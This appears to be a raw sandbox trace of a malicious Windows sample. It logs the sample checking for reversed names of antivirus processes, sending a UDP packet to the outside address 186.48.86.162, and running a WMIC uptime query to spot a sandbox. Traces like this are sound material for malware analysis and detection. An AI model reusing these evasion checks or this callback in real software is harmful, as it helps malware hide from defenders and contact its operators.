[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="secessmug2aacowten", cbMultiByte=7, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="secessmug2aacowten") returned 7
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="draugllub2aacowten", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="draugllub2aacowten") returned 9
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tneganlkb2aacowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tneganlkb2aacowten") returned 8
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="vakbanlkb2aacowten", cbMultiByte=4, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="vakbanlkb2aacowten") returned 4
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tshcvsccb2aacowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tshcvsccb2aacowten") returned 8
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="odomocccb2aacowten", cbMultiByte=6, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="odomocccb2aacowten") returned 6
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnegadmcb2aacowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tnegadmcb2aacowten") returned 8
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yart063acowten", cbMultiByte=11, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.yart063acowten") returned 11
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tngaesiu063acowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tngaesiu063acowten") returned 8
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="malcesiu063acowten", cbMultiByte=4, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="malcesiu063acowten") returned 4
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnegaredipsacowten", cbMultiByte=11, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tnegaredipsacowten") returned 11
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="ecivresmabmacowten", cbMultiByte=11, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="ecivresmabmacowten") returned 11
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.cvspavancowten", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.cvspavancowten") returned 12
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.mocvavancowten", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.mocvavancowten") returned 9
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartazancowten", cbMultiByte=10, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.yartazancowten") returned 10
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tenummitazancowten", cbMultiByte=7, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tenummitazancowten") returned 7
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.iugvazancowten", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.iugvazancowten") returned 9
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="yartmabmazancowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="yartmabmazancowten") returned 8
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="vrsmbmtmazancowten", cbMultiByte=7, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="vrsmbmtmazancowten") returned 7
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tirivmtmazancowten", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tirivmtmazancowten") returned 5
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.esnefedevitcahq", cbMultiByte=19, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.esnefedevitcahq") returned 19
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.cvsdpudsvitcahq", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.cvsdpudsvitcahq") returned 12
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnegacmdpudsvitcahq", cbMultiByte=7, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tnegacmdpudsvitcahq") returned 7
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="vrsdpuyapudsvitcahq", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="vrsdpuyapudsvitcahq") returned 8
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnciucmapudsvitcahq", cbMultiByte=7, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tnciucmapudsvitcahq") returned 7
[0572.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="yartexkapudsvitcahq", cbMultiByte=7, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="yartexkapudsvitcahq") returned 7
[0572.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="erocsexkpudsvitcahq", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="erocsexkpudsvitcahq") returned 8
[0572.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="cvsvaefmpudsvitcahq", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="cvsvaefmpudsvitcahq") returned 8
[0572.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="nacstr7kpudsvitcahq", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="nacstr7kpudsvitcahq") returned 8
[0572.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.gnepmsmsvitcahq", cbMultiByte=11, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.gnepmsmsvitcahq") returned 11
[0572.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tfosavalmsmsvitcahq", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tfosavalmsmsvitcahq") returned 8
[0572.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.dleihscmvitcahq", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.dleihscmvitcahq") returned 12
[0572.240] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x227eb36 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0572.240] DeleteFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078")) returned 0
[0572.240] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x227f1d8 | out: lpWSAData=0x227f1d8) returned 0
[0572.248] gethostname (in: name=0x227f0cc, namelen=256 | out: name="Q9iATrkPrH") returned 0
[0572.269] gethostbyname (name="Q9iATrkPrH") returned 0x1d06f60*(h_name="Q9iATrkPrH", h_aliases=0x1d06f80*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x1d06f88*=([0]="192.168.0.174"))
[0572.276] inet_ntoa (in=0xae00a8c0) returned="192.168.0.174"
[0572.276] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="192.168.0.174", cbMultiByte=13, lpWideCharStr=0x227e000, cchWideChar=2047 | out: lpWideCharStr="192.168.0.1749") returned 13
[0572.276] WSACleanup () returned 0
[0572.327] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x227f838 | out: lpWSAData=0x227f838) returned 0
[0572.333] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0572.333] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x1e8c2b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="186.48.86.162", lpUsedDefaultChar=0x0) returned 13
[0572.333] socket (af=2, type=2, protocol=17) returned 0x268
[0572.371] htons (hostshort=0xe061) returned 0x61e0
[0572.372] inet_addr (cp="186.48.86.162") returned 0xa25630ba
[0572.372] setsockopt (s=0x268, level=65535, optname=4102, optval="ÀÔ\x01", optlen=8) returned 0
[0572.372] sendto (s=0x268, buf=0x227ef5f*, len=96, flags=0, to=0x227ef4c*(sa_family=2, sin_port=0xe061, sin_addr="186.48.86.162"), tolen=16) returned 96
[0572.373] recvfrom (s=0x268, buf=0x227ee73, len=201, flags=0, from=0x227ef4c, fromlen=0x227ef48)
Thread:
id = 239
os_tid = 0x6bc
Thread:
id = 240
os_tid = 0x73c
Thread:
id = 265
os_tid = 0x558
Process:
id = "31"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x490f1000"
os_pid = "0x740"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "30"
os_parent_pid = "0x598"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WMIC PROCESS where name=\"wininit.exe\" get creationdate |more > %TEMP%\\~dr9078"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4750
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4751
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4752
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4753
start_va = 0x1f0000
end_va = 0x2effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 4754
start_va = 0x4a050000
end_va = 0x4a0a8fff
monitored = 1
entry_point = 0x4a0590b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 4755
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4756
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 4757
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4758
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4759
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4760
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 4761
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 4762
start_va = 0x2f0000
end_va = 0x51ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 4763
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4764
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4765
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4766
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4767
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4768
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 4769
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4770
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4771
start_va = 0x7fef72d0000
end_va = 0x7fef72d7fff
monitored = 0
entry_point = 0x7fef72d11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 4772
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4773
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4774
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4775
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4776
start_va = 0x520000
end_va = 0x69ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000520000"
filename = ""
Region:
id = 4777
start_va = 0xc0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 4778
start_va = 0x1c0000
end_va = 0x1e8fff
monitored = 0
entry_point = 0x1c1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4779
start_va = 0x6a0000
end_va = 0x827fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006a0000"
filename = ""
Region:
id = 4780
start_va = 0x1c0000
end_va = 0x1e8fff
monitored = 0
entry_point = 0x1c1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4781
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4782
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4783
start_va = 0x830000
end_va = 0x9b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000830000"
filename = ""
Region:
id = 4784
start_va = 0x9c0000
end_va = 0x1dbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009c0000"
filename = ""
Region:
id = 4785
start_va = 0x1c0000
end_va = 0x1dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 4786
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 4787
start_va = 0x2f0000
end_va = 0x2f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 4788
start_va = 0x420000
end_va = 0x51ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000420000"
filename = ""
Region:
id = 4789
start_va = 0x1dc0000
end_va = 0x208efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 241
os_tid = 0x74c
[0561.676] GetProcAddress (hModule=0x77b10000, lpProcName="SetConsoleInputExeNameW") returned 0x77b20c80
[0561.677] GetProcessHeap () returned 0x420000
[0561.677] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x4012) returned 0x43b010
[0561.677] GetProcessHeap () returned 0x420000
[0561.677] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x4010) returned 0x43f030
[0561.677] GetProcessHeap () returned 0x420000
[0561.677] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1a) returned 0x434780
[0561.677] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0561.677] GetProcessHeap () returned 0x420000
[0561.677] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434780 | out: hHeap=0x420000) returned 1
[0561.677] GetProcessHeap () returned 0x420000
[0561.678] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x43f030 | out: hHeap=0x420000) returned 1
[0561.678] GetProcessHeap () returned 0x420000
[0561.679] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x43b010 | out: hHeap=0x420000) returned 1
[0561.679] _wcsicmp (_String1="WMIC", _String2=")") returned 78
[0561.679] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17
[0561.679] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17
[0561.680] _wcsicmp (_String1="IF", _String2="WMIC") returned -14
[0561.680] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14
[0561.680] _wcsicmp (_String1="REM", _String2="WMIC") returned -5
[0561.680] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5
[0561.680] GetProcessHeap () returned 0x420000
[0561.680] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xb0) returned 0x439e80
[0561.680] GetProcessHeap () returned 0x420000
[0561.680] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1a) returned 0x434780
[0561.682] GetProcessHeap () returned 0x420000
[0561.682] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x78) returned 0x439f40
[0561.682] GetProcessHeap () returned 0x420000
[0561.682] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xb0) returned 0x439fc0
[0561.683] _wcsicmp (_String1="FOR", _String2="more") returned -7
[0561.683] _wcsicmp (_String1="FOR/?", _String2="more") returned -7
[0561.683] _wcsicmp (_String1="IF", _String2="more") returned -4
[0561.683] _wcsicmp (_String1="IF/?", _String2="more") returned -4
[0561.683] _wcsicmp (_String1="REM", _String2="more") returned 5
[0561.683] _wcsicmp (_String1="REM/?", _String2="more") returned 5
[0561.683] GetProcessHeap () returned 0x420000
[0561.683] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xb0) returned 0x43a080
[0561.683] GetProcessHeap () returned 0x420000
[0561.683] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1a) returned 0x4347b0
[0561.684] GetProcessHeap () returned 0x420000
[0561.684] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x14) returned 0x438640
[0561.684] GetProcessHeap () returned 0x420000
[0561.684] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x38) returned 0x4367d0
[0561.690] GetProcessHeap () returned 0x420000
[0561.690] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x6a) returned 0x43a140
[0561.691] GetProcessHeap () returned 0x420000
[0561.691] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x48) returned 0x43a1c0
[0561.691] _pipe (in: _PtHandles=0x43a1d0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x43a1d0) returned 0
[0561.692] _dup (_FileHandle=1) returned 5
[0561.693] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0
[0561.694] _close (_FileHandle=4) returned 0
[0561.694] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19
[0561.694] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18
[0561.694] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19
[0561.694] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3
[0561.694] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20
[0561.694] _wcsicmp (_String1="WMIC", _String2="CD") returned 20
[0561.694] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20
[0561.694] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5
[0561.694] _wcsicmp (_String1="WMIC", _String2="REN") returned 5
[0561.694] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18
[0561.695] _wcsicmp (_String1="WMIC", _String2="SET") returned 4
[0561.695] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7
[0561.695] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19
[0561.695] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3
[0561.695] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7
[0561.695] _wcsicmp (_String1="WMIC", _String2="MD") returned 10
[0561.695] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10
[0561.695] _wcsicmp (_String1="WMIC", _String2="RD") returned 5
[0561.695] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5
[0561.695] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7
[0561.695] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16
[0561.695] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4
[0561.695] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20
[0561.695] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20
[0561.695] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1
[0561.695] _wcsicmp (_String1="WMIC", _String2="VER") returned 1
[0561.695] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1
[0561.695] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18
[0561.695] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4
[0561.695] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18
[0561.695] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3
[0561.696] _wcsicmp (_String1="WMIC", _String2="START") returned 4
[0561.696] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19
[0561.696] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12
[0561.696] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10
[0561.696] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7
[0561.696] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7
[0561.696] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22
[0561.696] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17
[0561.696] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21
[0561.696] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20
[0561.696] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10
[0561.696] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19
[0561.696] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18
[0561.696] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19
[0561.696] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3
[0561.696] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20
[0561.696] _wcsicmp (_String1="WMIC", _String2="CD") returned 20
[0561.696] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20
[0561.696] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5
[0561.696] _wcsicmp (_String1="WMIC", _String2="REN") returned 5
[0561.696] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18
[0561.696] _wcsicmp (_String1="WMIC", _String2="SET") returned 4
[0561.697] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7
[0561.697] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19
[0561.697] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3
[0561.697] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7
[0561.697] _wcsicmp (_String1="WMIC", _String2="MD") returned 10
[0561.697] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10
[0561.697] _wcsicmp (_String1="WMIC", _String2="RD") returned 5
[0561.697] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5
[0561.697] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7
[0561.697] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16
[0561.697] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4
[0561.697] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20
[0561.697] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20
[0561.697] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1
[0561.697] _wcsicmp (_String1="WMIC", _String2="VER") returned 1
[0561.697] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1
[0561.697] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18
[0561.697] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4
[0561.697] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18
[0561.697] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3
[0561.697] _wcsicmp (_String1="WMIC", _String2="START") returned 4
[0561.697] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19
